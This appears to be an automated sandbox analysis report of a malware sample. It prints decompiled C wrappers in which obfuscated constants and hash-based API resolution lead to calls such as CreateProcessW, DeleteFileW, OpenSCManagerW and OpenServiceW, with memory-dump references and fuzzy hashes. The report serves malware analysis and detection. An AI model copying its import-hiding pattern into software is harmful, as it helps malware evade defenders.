                                          • Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00211000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x00211006
                                          0x00211009
                                          0x0021100c
                                          0x00211011
                                          0x00211016
                                          0x0021101d
                                          0x00211026
                                          0x0021102d
                                          0x00211034
                                          0x0021103b
                                          0x00211047
                                          0x0021104f
                                          0x00211057
                                          0x0021105e
                                          0x00211065
                                          0x0021106c
                                          0x00211073
                                          0x00211077
                                          0x0021108b
                                          0x00211096
                                          0x0021109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00214859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00214859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x0021485e
                                          0x0021487a
                                          0x0021487d
                                          0x00214884
                                          0x0021488b
                                          0x00214892
                                          0x0021489d
                                          0x002148a0
                                          0x002148ad
                                          0x002148b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002148B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: f34ee4eb2b485e945288599d497fbdc208df6c84720c6139dbff6cf129befafa
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 8CF017B0A15209FBDB04CFE8DA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00224F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E00224F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x00224f80
                                          0x00224f81
                                          0x00224f82
                                          0x00224f86
                                          0x00224f87
                                          0x00224f8c
                                          0x00224fa5
                                          0x00224fa8
                                          0x00224faf
                                          0x00224fb6
                                          0x00224fc7
                                          0x00224fca
                                          0x00224fd7
                                          0x00224fe2
                                          0x00224fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x00229772
                                          0x00229773
                                          0x00229778
                                          0x0022977a
                                          0x0022977b
                                          0x0022977e
                                          0x0022977f
                                          0x00229782
                                          0x00229785
                                          0x00229788
                                          0x00229789
                                          0x0022978c
                                          0x0022978f
                                          0x00229790
                                          0x00229791
                                          0x00229794
                                          0x00229797
                                          0x0022979a
                                          0x0022979d
                                          0x002297a0
                                          0x002297a3
                                          0x002297a6
                                          0x002297a7
                                          0x002297a8
                                          0x002297ad
                                          0x002297b7
                                          0x002297c3
                                          0x002297ca
                                          0x002297d1
                                          0x002297d8
                                          0x002297df
                                          0x002297e3
                                          0x002297fc
                                          0x00229816
                                          0x0022981d

                                          APIs
                                          • CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 8af8b585893f82bc15f7c07b0853e93990054816491876dc31458a1a35a57156
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 8111B372911148BBDF199FD6DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0021602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x0021b569
                                          0x0021b56a
                                          0x0021b56d
                                          0x0021b572
                                          0x0021b574
                                          0x0021b577
                                          0x0021b57a
                                          0x0021b57d
                                          0x0021b580
                                          0x0021b583
                                          0x0021b586
                                          0x0021b587
                                          0x0021b58a
                                          0x0021b58d
                                          0x0021b590
                                          0x0021b593
                                          0x0021b594
                                          0x0021b595
                                          0x0021b59a
                                          0x0021b5a4
                                          0x0021b5b8
                                          0x0021b5c0
                                          0x0021b5c4
                                          0x0021b5cb
                                          0x0021b5d2
                                          0x0021b5d9
                                          0x0021b5e6
                                          0x0021b5fd
                                          0x0021b604

                                          APIs
                                          • CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x00229821
                                          0x00229822
                                          0x00229825
                                          0x00229828
                                          0x0022982a
                                          0x0022982c
                                          0x0022982f
                                          0x00229832
                                          0x00229835
                                          0x00229836
                                          0x00229837
                                          0x0022983c
                                          0x00229855
                                          0x00229858
                                          0x0022985f
                                          0x00229866
                                          0x0022986d
                                          0x00229874
                                          0x0022987b
                                          0x0022988e
                                          0x0022989b
                                          0x002298a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00227BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x00227bf7
                                          0x00227bf8
                                          0x00227bfa
                                          0x00227bfd
                                          0x00227bff
                                          0x00227c02
                                          0x00227c06
                                          0x00227c07
                                          0x00227c0f
                                          0x00227c1d
                                          0x00227c25
                                          0x00227c2d
                                          0x00227c31
                                          0x00227c38
                                          0x00227c3f
                                          0x00227c46
                                          0x00227c4a
                                          0x00227c5e
                                          0x00227c67
                                          0x00227c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 4506c20672cf2cf3caec14a6ca0a9d6c1bf7f964dc28c20fa5fa43f13956cead
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 7E014FB190120CFFEB09DF94D84A8DEBBB5EF44314F108198F40567240E7B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021F65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                          0x0021f662
                                          0x0021f663
                                          0x0021f665
                                          0x0021f668
                                          0x0021f66a
                                          0x0021f66d
                                          0x0021f670
                                          0x0021f673
                                          0x0021f677
                                          0x0021f678
                                          0x0021f67d
                                          0x0021f687
                                          0x0021f693
                                          0x0021f69a
                                          0x0021f6a1
                                          0x0021f6a5
                                          0x0021f6a9
                                          0x0021f6b0
                                          0x0021f6c9
                                          0x0021f6d8
                                          0x0021f6de

                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021B6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0021602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x0021b6f3
                                          0x0021b6f8
                                          0x0021b702
                                          0x0021b70b
                                          0x0021b712
                                          0x0021b719
                                          0x0021b720
                                          0x0021b727
                                          0x0021b72e
                                          0x0021b747
                                          0x0021b759
                                          0x0021b75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x0022aa3f
                                          0x0022aa40
                                          0x0022aa41
                                          0x0022aa44
                                          0x0022aa47
                                          0x0022aa4b
                                          0x0022aa4c
                                          0x0022aa51
                                          0x0022aa5b
                                          0x0022aa64
                                          0x0022aa68
                                          0x0022aa6f
                                          0x0022aa76
                                          0x0022aa8d
                                          0x0022aa90
                                          0x0022aa9d
                                          0x0022aaa8
                                          0x0022aaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00215FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00215FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x00215fb5
                                          0x00215fb6
                                          0x00215fb7
                                          0x00215fbb
                                          0x00215fbc
                                          0x00215fc1
                                          0x00215fcb
                                          0x00215fd7
                                          0x00215fde
                                          0x00215fe5
                                          0x00215ffc
                                          0x00215fff
                                          0x00216006
                                          0x0021600d
                                          0x0021601a
                                          0x00216025
                                          0x0021602a

                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Analysis Process: rundll32.exe PID: 2204 Parent PID: 1604 rundll32.exeCOMMON

                                          Executed Functions

                                          Function 00212959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0021602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                          0x0021295f
                                          0x00212964
                                          0x00212967
                                          0x0021296a
                                          0x0021296d
                                          0x0021296e
                                          0x0021296f
                                          0x00212977
                                          0x00212985
                                          0x0021298a
                                          0x00212992
                                          0x0021299a
                                          0x002129a2
                                          0x002129a9
                                          0x002129b0
                                          0x002129b7
                                          0x002129bb
                                          0x002129cf
                                          0x002129dc
                                          0x002129e2

                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
